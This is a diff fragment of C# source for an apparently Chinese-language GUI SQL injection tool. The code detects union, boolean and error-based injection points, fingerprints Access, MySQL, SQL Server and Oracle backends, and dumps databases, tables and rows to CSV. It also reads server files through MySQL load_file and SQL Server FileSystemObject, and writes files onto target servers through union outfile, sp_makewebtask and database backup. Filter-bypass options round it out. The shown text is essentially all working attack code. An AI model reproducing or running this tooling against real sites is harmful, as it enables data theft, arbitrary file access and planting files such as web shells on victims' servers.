+ //%16不能被URL编码
+ payload_request = request.Replace(strparam, payload_location + "%16");
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTest(i, basestr) + " from MSysAccessObjects");
+ }
+
+ ServerInfo errorServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, unionPayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if ("Oracle".Equals(currentDB) && (errorServer.body.IndexOf("null") != -1 || errorServer.body.IndexOf("NULL") != -1))
+ {
+ for (int j = 1; j <= i; j++)
+ {
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTestByOracle(i, j, "chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)"));
+
+ ServerInfo oracleunionServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, unionPayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (errorServer.code == 200 && oracleunionServer.body.IndexOf("1111111111") != -1)
+ {
+ isFind = true;
+ newParam = strparam.Replace(param, param + "" + payload.Replace("{payload}", "#inject#") + "");
+ if ("Access".Equals(currentDB))
+ {
+ //%16不能被URL编码
+ newParam = strparam.Replace(param, param + "" + payload.Replace("{payload}", "#inject#") + "%16");
+ }
+ unionInject = true;
+ this.cbox_basic_injectType.SelectedIndex = 1;
+ this.txt_inject_unionColumnsCount.Text = i + "";
+ this.txt_inject_showColumn.Text = j + "";
+ break;
+ }
+ }
+ }
+ else
+ {
+ for (int j = 1; j <= i; j++)
+ {
+ String basecolumn = (basestr + j).ToString();
+ if (errorServer.code == 200 && errorServer.body.IndexOf((basecolumn)) != -1)
+ {
+ isFind = true;
+ newParam = strparam.Replace(param, param + "" + payload.Replace("{payload}", "#inject#") + "");
+ selectInjectType(3);
+ unionInject = true;
+ this.txt_inject_unionColumnsCount.Text = i + "";
+ this.txt_inject_showColumn.Text = j + "";
+ break;
+ }
+ }
+ }
+
+
+ }
+ if (isFind)
+ {
+
+ this.Invoke(new StringDelegate(log), "此注入点支持Union注入,自动选择注入方式完成!");
+ }
+ if (boolInject || errorInject || unionInject)
+ {
+ //替换注入位置-标记注入
+ this.txt_inject_request.Text = request.Replace(strparam, newParam);
+ }
+
+ }
+
+
+ }
+ catch (Exception e)
+ {
+
+ Tools.SysLog("识别注入发生异常!" + e.Message);
+ this.Invoke(new StringDelegate(log), "识别注入发生异常!" + e.Message);
+ }
+ this.Invoke(new StringDelegate(log), "注入测试完成!");
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ }
+ public void selectInjectType(int index)
+ {
+ this.cbox_basic_injectType.SelectedIndex = index;
+ }
+ public void selectDB(String currentDB)
+ {
+
+ if ("UnKnow".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 0;
+ }
+ if ("Access".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 1;
+ }
+ else if ("MySQL".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 2;
+ }
+ else if ("SQLServer".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 3;
+ }
+ else if ("Oracle".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 4;
+ }
+ this.Invoke(new StringDelegate(log), "自动选择数据库类型完成!");
+ }
+
+ private void data_dbs_tsl_getDatas_Click(object sender, EventArgs e)
+ {
+
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+
+ if (!checkConfig())
+ {
+ return;
+ }
+ if (!isSetInjectPoint())
+ {
+ return;
+ }
+
+ status = 1;
+ List list_columns = new List();
+ foreach (ColumnHeader ch in this.data_dbs_lvw_data.Columns)
+ {
+ list_columns.Add(ch.Text);
+ }
+ if (list_columns.Count > 0)
+ {
+
+ this.data_dbs_lvw_data.Items.Clear();
+ }
+ this.currentDataCount = 0;
+ this.currentThread = new Thread(new ParameterizedThreadStart(getData));
+ this.currentThread.Start(list_columns);
+ }
+ else
+ {
+ MessageBox.Show("还有线程未结束,请稍候....");
+ }
+
+ }
+ public int export = 0;
+ private void data_dbs_tsl_exportDatas_Click(object sender, EventArgs e)
+ {
+
+ if (export == 0)
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.csv";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ Thread eth = new Thread(exportData);
+ eth.Start(saveFileDialog.FileName);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请稍候,还有导出任务正在进行!");
+ }
+ export = 0;
+ }
+
+ public void exportData(Object path)
+ {
+ try
+ {
+ FileStream fs = new FileStream(path.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ String columns = "";
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ columns += ("\"" + dc.Text + "\",");
+ }
+ sw.WriteLine(columns.Substring(0, columns.Length - 1));
+ foreach (ListViewItem sv in this.data_dbs_lvw_data.Items)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (ListViewItem.ListViewSubItem subv in sv.SubItems)
+ {
+ sb.Append("\"" + subv.Text + "\",");
+ }
+ sb.Remove(sb.Length - 1, 1);
+ sw.WriteLine(sb.ToString());
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("导出数据发生异常!" + e.Message);
+ MessageBox.Show("导出数据发生异常!");
+ }
+ export = 0;
+
+ }
+
+ private void cbox_basic_injectType_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ switch (this.cbox_basic_injectType.SelectedIndex)
+ {
+
+ case 0:
+ config.injectType = InjectType.UnKnow;
+ break;
+
+ case 1:
+ config.injectType = InjectType.Bool;
+ break;
+ case 2:
+ config.injectType = InjectType.Error;
+ break;
+ case 3:
+ config.injectType = InjectType.Union;
+ break;
+ case 4:
+ config.injectType = InjectType.Sleep;
+ break;
+ }
+ }
+
+ private void cbox_basic_dbType_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ switch (this.cbox_basic_dbType.SelectedIndex)
+ {
+
+ case 0:
+ config.dbType = DBType.UnKnow;
+ break;
+ case 1:
+ config.dbType = DBType.Access;
+ break;
+ case 2:
+ config.dbType = DBType.MySQL5;
+ break;
+ case 3:
+ config.dbType = DBType.SQLServer;
+ break;
+ case 4:
+ config.dbType = DBType.Oracle;
+ break;
+ case 5:
+ config.dbType = DBType.MySQL4;
+ break;
+ }
+ }
+ private void txt_inject_unionColumnsCount_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_unionColumnsCount.Text))
+ {
+ config.columnsCount = int.Parse(this.txt_inject_unionColumnsCount.Text);
+ }
+
+ }
+
+ private void txt_inject_showColumn_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_showColumn.Text))
+ {
+ config.showColumn = int.Parse(this.txt_inject_showColumn.Text);
+ }
+ }
+
+ private void txt_inject_key_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_key.Text))
+ {
+ config.key = this.txt_inject_key.Text;
+ config.maxTime = Tools.convertToInt(config.key);
+ if (config.maxTime == 0 && config.keyType.Equals(KeyType.Time))
+ {
+ MessageBox.Show("输入的判断值不是数字,请重新输入判断值,单位秒!");
+ }
+ }
+ }
+
+ private void tsmi_seting_Click(object sender, EventArgs e)
+ {
+ Seting set = new Seting(this);
+ set.Show();
+ }
+
+ private void Main_FormClosing(object sender, FormClosingEventArgs e)
+ {
+
+ try
+ {
+ XML.saveConfig("lastConfig.xml", this.config);
+ }
+ catch (Exception ex)
+ {
+ Tools.SysLog("保存配置发生错误!" + ex.Message);
+ }
+
+ System.Environment.Exit(0);
+ }
+
+ private void tsmi_about_Click(object sender, EventArgs e)
+ {
+ About ab = new About();
+ ab.Show();
+ }
+
+ private void tsmi_mustRead_Click(object sender, EventArgs e)
+ {
+ Waring w = new Waring();
+ w.Show();
+ }
+
+ private void chk_inject_foward_302_CheckedChanged(object sender, EventArgs e)
+ {
+ config.is_foward_302 = this.chk_inject_foward_302.Checked;
+ }
+
+
+ private void btn_exportConfig_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ MessageBox.Show("导出成功!");
+ }
+
+
+ }
+
+ private void chk_openURLEncoding_CheckedChanged(object sender, EventArgs e)
+ {
+ config.isOpenURLEncoding = this.chk_openURLEncoding.Checked;
+ }
+
+ private void data_cms_tsmi_copyVerValue_Click(object sender, EventArgs e)
+ {
+ if (this.data_lvw_ver.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ Clipboard.SetText(this.data_lvw_ver.SelectedItems[0].SubItems[1].Text);
+ MessageBox.Show("复制成功!");
+ }
+
+ private void data_cms_tsmi_stopGetVariable_Click(object sender, EventArgs e)
+ {
+
+ StopThread();
+ }
+
+ private void data_dbs_tsmi_getTableNames_Click(object sender, EventArgs e)
+ {
+ TreeNode tn = this.data_tvw_dbs.SelectedNode;
+ if (tn != null)
+ {
+ tn.BeginEdit();
+ }
+ }
+
+ private void chk_useSSL_CheckedChanged(object sender, EventArgs e)
+ {
+ if (this.chk_useSSL.Checked)
+ {
+ config.useSSL = true;
+ this.txt_basic_port.Text = "443";
+ }
+ else
+ {
+ config.useSSL = false;
+ this.txt_basic_port.Text = "80";
+ }
+ }
+
+ private void data_dbs_tsmi_stopGetInfos_Click(object sender, EventArgs e)
+ {
+ StopThread();
+ }
+
+ private void data_tvw_dbs_AfterCheck(object sender, TreeViewEventArgs e)
+ {
+ String cname = e.Node.Text;
+ Boolean isColumn = e.Node.Tag.ToString().Equals("column");
+ Boolean isTable = e.Node.Tag.ToString().Equals("table");
+ Boolean isDB = e.Node.Tag.ToString().Equals("dbs");
+ if (!e.Node.Checked)
+ {
+ if (isDB || isTable)
+ {
+ //不选
+ foreach (TreeNode tn in e.Node.Nodes)
+ {
+ if (tn.Checked)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ }
+ if (isColumn)
+ {
+
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ if (dc.Text.Equals(cname))
+ {
+ this.data_dbs_lvw_data.Columns.Remove(dc);
+ }
+
+ }
+ }
+ }
+ else
+ {
+ if (isTable)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ if (tn.Checked && tn != e.Node.Parent)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ }
+
+ if (isColumn)
+ {
+ foreach (TreeNode tn in e.Node.Parent.Parent.Nodes)
+ {
+ if (tn.Checked && tn != e.Node.Parent)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ e.Node.Parent.Checked = true;
+
+ if (!this.curren_table.Equals(e.Node.Parent.Text))
+ {
+ this.data_dbs_lvw_data.Columns.Clear();
+ }
+ ColumnHeader ch = new ColumnHeader("col_" + cname);
+ bool isExists = false;
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ if (dc.Text.Equals(cname))
+ {
+ isExists = true;
+ break;
+ }
+
+ }
+ if (!isExists)
+ {
+ ch.Text = cname;
+ this.data_dbs_lvw_data.Columns.Add(ch);
+ }
+ //设置当前数据库和表
+ this.curren_db = e.Node.Parent.Parent.Text;
+ this.curren_table = e.Node.Parent.Text;
+ }
+ }
+ }
+
+ private void data_tvw_dbs_AfterSelect(object sender, TreeViewEventArgs e)
+ {
+ if (e.Node.Checked)
+ {
+ e.Node.Checked = false;
+ }
+ else
+ {
+ e.Node.Checked = true;
+ }
+ }
+
+ private void data_dbs_lvw_tsmi_stop_Click(object sender, EventArgs e)
+ {
+ StopThread();
+ }
+
+ private void txt_basic_host_TextChanged(object sender, EventArgs e)
+ {
+ config.domain = this.txt_basic_host.Text;
+ }
+
+ private void txt_basic_port_TextChanged(object sender, EventArgs e)
+ {
+ config.port = Tools.convertToInt(this.txt_basic_port.Text);
+ }
+
+ private void txt_inject_request_TextChanged(object sender, EventArgs e)
+ {
+ config.request = this.txt_inject_request.Text;
+ }
+
+ private void chk_inject_reverseKey_CheckedChanged(object sender, EventArgs e)
+ {
+ config.reverseKey = this.chk_inject_reverseKey.Checked;
+ }
+
+ private void tsmi_openConfig_Click(object sender, EventArgs e)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+ this.config = XML.readConfig(ofd.FileName);
+ reloadConfig(this.config);
+ MessageBox.Show("加载配置成功!");
+ }
+ }
+
+ public void reloadConfig(Config config)
+ {
+
+ this.txt_basic_host.Text = config.domain;
+ this.txt_basic_port.Text = config.port + "";
+ this.cbox_basic_timeOut.Text = config.timeOut + "";
+ this.cbox_basic_encoding.Text = config.encoding;
+
+ switch (config.injectType)
+ {
+
+ case InjectType.UnKnow:
+ this.cbox_basic_injectType.SelectedIndex = 0;
+ break;
+ case InjectType.Bool:
+ this.cbox_basic_injectType.SelectedIndex = 1;
+ break;
+ case InjectType.Error:
+ this.cbox_basic_injectType.SelectedIndex = 2;
+ break;
+ case InjectType.Union:
+ this.cbox_basic_injectType.SelectedIndex = 3;
+ break;
+
+ }
+ switch (config.dbType)
+ {
+
+ case DBType.UnKnow:
+ this.cbox_basic_dbType.SelectedIndex = 0;
+ break;
+ case DBType.Access:
+ this.cbox_basic_dbType.SelectedIndex = 1;
+ break;
+ case DBType.MySQL5:
+ this.cbox_basic_dbType.SelectedIndex = 2;
+ break;
+ case DBType.SQLServer:
+ this.cbox_basic_dbType.SelectedIndex = 3;
+ break;
+ case DBType.Oracle:
+ this.cbox_basic_dbType.SelectedIndex = 4;
+ break;
+ case DBType.MySQL4:
+ this.cbox_basic_dbType.SelectedIndex = 5;
+ break;
+ }
+ this.data_dbs_cob_db_encoding.Text = config.db_encoding;
+ this.cbox_basic_threadSize.Text = config.threadSize + "";
+ this.cbox_basic_reTryCount.Text = config.reTry + "";
+ this.txt_inject_key.Text = config.key;
+ this.chk_inject_foward_302.Checked = config.is_foward_302;
+ this.chk_inject_reverseKey.Checked = config.reverseKey;
+
+ switch (config.keyType)
+ {
+
+ case KeyType.Key:
+ this.cbox_inject_type.SelectedIndex = 0;
+ break;
+ case KeyType.Code:
+ this.cbox_inject_type.SelectedIndex = 1;
+ break;
+ case KeyType.Length:
+ this.cbox_inject_type.SelectedIndex = 2;
+ break;
+ case KeyType.Time:
+ this.cbox_inject_type.SelectedIndex = 3;
+ config.maxTime = Tools.convertToInt(config.key);
+ break;
+ }
+
+ this.chk_openURLEncoding.Checked = config.isOpenURLEncoding;
+ this.chk_useSSL.Checked = config.useSSL;
+ this.txt_inject_unionColumnsCount.Text = config.columnsCount + "";
+ this.txt_inject_showColumn.Text = config.showColumn + "";
+
+ this.txt_inject_request.Text = config.request;
+ //file
+
+ this.cbox_file_readFileEncoding.Text = config.readFileEncoding;
+
+ //cmd
+ this.cmd_chk_showCmdResult.Checked = config.showCmdResult;
+ //bypass
+ this.bypass_chk_inculdeStr.Checked = config.inculdeStr;
+ this.cob_keyRepalce.SelectedIndex = config.keyReplace;
+ this.bypass_chk_base64.Checked = config.base64;
+ this.cbox_base64Count.SelectedIndex = config.base64Count-1;
+ this.cbox_bypass_urlencode_count.SelectedIndex = config.urlencodeCount - 1;
+
+ //替换字符
+ this.chk_reaplaceBeforURLEncode.Checked = config.reaplaceBeforURLEncode;
+ String[] replaceStrs = Regex.Split(config.replaceStrs, "\\n");
+ config.replaceStrs = config.replaceStrs.Replace("\t\n","");
+ if (replaceStrs.Length > 0)
+ {
+
+ foreach (String line in replaceStrs)
+ {
+ String[] strs = Regex.Split(line, "\\t");
+ if (strs.Length == 2)
+ {
+ if (!String.IsNullOrEmpty(strs[0])&& !this.replaceList.Contains(strs[0])) {
+ this.replaceList.Add(strs[0], strs[1]);
+ ListViewItem lvi = new ListViewItem(strs[0]);
+ lvi.SubItems.Add(strs[1]);
+ lvi.Name = strs[1];
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+ }
+ }
+ }
+
+ }
+
+ this.bypass_cbox_sendHTTPSleepTime.Text = config.sendHTTPSleepTime + "";
+ this.bypass_cbox_randIPToHeader.Text = config.randIPToHeader;
+
+
+
+
+
+ }
+
+ public FindString fs = null;
+ public void showFindString(object sender, KeyEventArgs e, TextBox textBox)
+ {
+ if (e.Control && e.KeyCode == Keys.F)
+ {
+ if (fs == null)
+ {
+
+ fs = new FindString();
+
+ }
+ fs.txtbox = textBox;
+ fs.ShowDialog();
+ }
+ }
+
+
+ private void log_txt_response_KeyDown(object sender, KeyEventArgs e)
+ {
+ showFindString(sender, e, this.log_txt_response);
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void txt_inject_request_KeyDown(object sender, KeyEventArgs e)
+ {
+ showFindString(sender, e, this.txt_inject_request);
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void data_dbs_lvw_tsmi_copyLineData_Click(object sender, EventArgs e)
+ {
+ if (this.data_dbs_lvw_data.SelectedItems.Count > 0)
+ {
+ ListViewItem lvi = this.data_dbs_lvw_data.SelectedItems[0];
+ StringBuilder str = new StringBuilder();
+ foreach (ListViewItem.ListViewSubItem clvi in lvi.SubItems)
+ {
+ str.Append(clvi.Text + "----");
+ }
+ if (str.Length > 0)
+ {
+ //清空剪切板内容
+ Clipboard.Clear();
+ //复制内容到剪切板
+ Clipboard.SetData(DataFormats.Text, str.Remove(str.Length - 4, 4));
+ MessageBox.Show("复制成功!");
+ }
+
+ }
+ }
+
+ private void tsmi_saveConfig_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ }
+
+ MessageBox.Show("导出成功!");
+ }
+
+ private void tsmi_update_Click(object sender, EventArgs e)
+ {
+ new Thread(checkUpdate).Start();
+ }
+
+ private void timer_status_Tick(object sender, EventArgs e)
+ {
+ this.runTime++;
+ this.status_lbl_time.Text = this.runTime + "s";
+ this.status_lbl_threadStatus.Text = MyThreadPool.getCurrentThreadCount() + "/" + this.cbox_basic_threadSize.Text;
+
+ getDBStatus();
+ this.status_lbl_dbsCount.Text = this.currentDbsCount + "/" + this.dbsCount;
+ this.status_lbl_tableCount.Text = this.currentTableCount + "/" + this.tableCount;
+ if (this.currentDataCount == 0)
+ {
+ this.currentDataCount = this.data_dbs_lvw_data.Items.Count;
+ }
+ this.status_lbl_dataCount.Text = this.currentDataCount + "/" + this.dataCount;
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ this.status_lbl_runStatus.Text = "未开始";
+ }
+ else
+ {
+
+ this.status_lbl_runStatus.Text = "正在运行";
+ }
+ this.status_lbl_all_status.Text = comm_currentCount + "/" + comm_count;
+ this.lbl_packsCount.Text = HTTP.index.ToString();
+
+ }
+
+ public void getDBStatus()
+ {
+
+ this.currentDbsCount = 0;
+ this.currentTableCount = 0;
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+
+ if ("dbs".Equals(tn.Tag))
+ {
+
+ this.currentDbsCount++;
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+
+ if ("table".Equals(ctn.Tag))
+ {
+
+ this.currentTableCount++;
+ }
+ }
+ }
+ }
+ }
+ String[] ver_tmp = null;
+ public void file_txt_resultSetText(String text)
+ {
+ this.file_txt_result.Text = text;
+ }
+
+ public void cmd_txt_resultSetText(String text)
+ {
+ this.cmd_txt_result.Text = text;
+ }
+
+ public void readOrWriteFile()
+ {
+ String path = this.file_txt_filePath.Text;
+ String path_16 = Tools.strToHex(path, "UTF-8");
+ String data_payload = "";
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "FileThread-";
+ }
+ if (this.file_cbox_readWrite.SelectedIndex == 0)
+ {
+ data_payload = MySQL5.hex.Replace("{data}", "load_file(" + path_16 + ")");
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ try
+ {
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show("大侠,请在注入中心,配置Bool盲注的关键字!");
+ return;
+ }
+ String payload_len = MySQL5.ver_length.Replace("{data}", data_payload);
+ int len = getValueByStepUp(payload_len, 0, 50000);
+ this.dataCount = len;
+ String value = "";
+ ver_tmp = new String[len];
+ //获取值
+ for (int i = 0; i < len; i++)
+ {
+ MyThreadPool.initThread(new ParameterizedThreadStart(readOrWriteFileByMySQLByHexAscii), data_payload + "#" + i);
+ this.currentDataCount = i;
+ }
+ while (status == 1)
+ {
+
+ Thread.Sleep(50);
+ if (MyThreadPool.getCurrentThreadCount() == 0)
+ {
+
+ if (ver_tmp != null)
+ {
+ value = Tools.unHex(Tools.convertToString(ver_tmp), config.readFileEncoding);
+ break;
+ }
+
+ }
+
+ }
+ this.Invoke(new StringDelegate(file_txt_resultSetText), value);
+ this.Invoke(new StringDelegate(log), this.file_cbox_readWrite.Text + "完成!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Union:
+ try
+ {
+ if (config.columnsCount <= 0)
+ {
+ MessageBox.Show("大侠,请在注入中心,配置Union注入的列数!");
+ return;
+ }
+
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", MySQL5.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, "convert(load_file(" + path_16 + ") using UTF8)")));
+ this.dataCount = result.Length;
+ this.currentDataCount = result.Length;
+ this.Invoke(new StringDelegate(file_txt_resultSetText), result);
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到文件数据!");
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Error:
+ try
+ {
+ String payload_len = MySQL5.char_length.Replace("{data}", data_payload);
+ String payload_len_error = MySQL5.error_value.Replace("{data}", MySQL5.creatMySQLColumnStr(payload_len));
+
+ String result_length = getOneDataByUnionOrError(payload_len_error);
+
+
+ int sumlen = Tools.convertToInt(result_length);
+ this.dataCount = sumlen;
+ String result = "";
+
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_tmp = MySQL5.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString()).Replace("{len}", count.ToString()));
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_tmp);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ this.currentDataCount = result.Length;
+ this.Invoke(new StringDelegate(file_txt_resultSetText), Tools.unHex(result, config.readFileEncoding));
+ }
+ //查找格式^^^col$$$col^^^
+ result = Tools.unHex(result, config.readFileEncoding);
+ Match m = Regex.Match(result, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ result = m.Value;
+ }
+ this.Invoke(new StringDelegate(file_txt_resultSetText), result);
+ this.Invoke(new StringDelegate(log), "获取文件内容!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+
+ }
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 1)
+ {
+ //union方式写文件
+ if (config.injectType.Equals(InjectType.Union))
+ {
+ if (!String.IsNullOrEmpty(this.file_txt_result.Text))
+ {
+ String payload = MySQL5.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, path, this.file_txt_result.Text);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else
+ {
+ MessageBox.Show("请在下面输入您要写入文件的内容,请注意,GET方式的注入提交数据不能超过1024个字节!");
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("大侠此种方式写文件,只支持Union注入!");
+ }
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 2)
+ {
+ //filesystemobject写文件
+ String payload = MSSQL.witeFileByFileSystemObject.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 3)
+ {
+ //sp_makewebtask写文件
+ String payload = MSSQL.witeFileBySP_MakeWebTask.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 4)
+ {
+ //backup database写文件
+ String payload = MSSQL.witeFileByBackDataBase.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 5)
+ {
+ //filesystemobject读文件
+ String payload = MSSQL.readFileByFileSystemobject.Replace("{path}", path);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+
+ //取每一列的值
+ data_payload = MSSQL.file_content;
+ String payload_len = MSSQL.bool_dataLength.Replace("{data}", data_payload);
+ int len = getValue(payload_len, 0, 1024 * 100);
+ ver_tmp = new String[len];
+ this.dataCount = len;
+ this.Invoke(new StringDelegate(log), "SQLServer读到文件内容,长度为" + len + "字节!");
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ MyThreadPool.initThread(new ParameterizedThreadStart(getFileContentBySQLServer), i);
+ this.currentDataCount = i;
+ }
+ while (status == 1)
+ {
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ this.Invoke(new StringDelegate(file_txt_resultSetText), Tools.StringArrayToString(ver_tmp));
+ this.Invoke(new StringDelegate(log), "获取SQLServer读到文件内容完成!");
+ break;
+ }
+ Thread.Sleep(50);
+ }
+ break;
+
+ case InjectType.Union:
+
+ String unionresult = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.file_content));
+ this.Invoke(new StringDelegate(file_txt_resultSetText), unionresult);
+ this.Invoke(new StringDelegate(log), "获取到SQLServer读取的文件内容,长度为" + unionresult.Length + "字节!");
+ break;
+ case InjectType.Error:
+
+ String errorresult = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.file_content));
+ this.Invoke(new StringDelegate(file_txt_resultSetText), errorresult);
+ this.Invoke(new StringDelegate(log), "获取到SQLServer读取的文件内容,长度为" + errorresult.Length + "字节!");
+ break;
+ case InjectType.Sleep:
+ getDatasByUnion(config.dbType, null, 1, 1);
+ break;
+ }
+ }
+ this.file_btn_start.Text = "开始";
+ status = 0;
+
+ }
+
+ public void getFileContentBySQLServer(Object index)
+ {
+ try
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", index + "").Replace("{data}", MSSQL.file_content);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+
+ String value = "";
+
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+ int rstr = int.Parse(unicodes.ToString());
+ if (rstr <= 255)
+ {
+ value += (char)rstr;
+ }
+ else
+ {
+ value += Tools.unHexByUnicode(rstr, config.readFileEncoding);
+ }
+ ver_tmp[int.Parse(index.ToString()) - 1] = value;
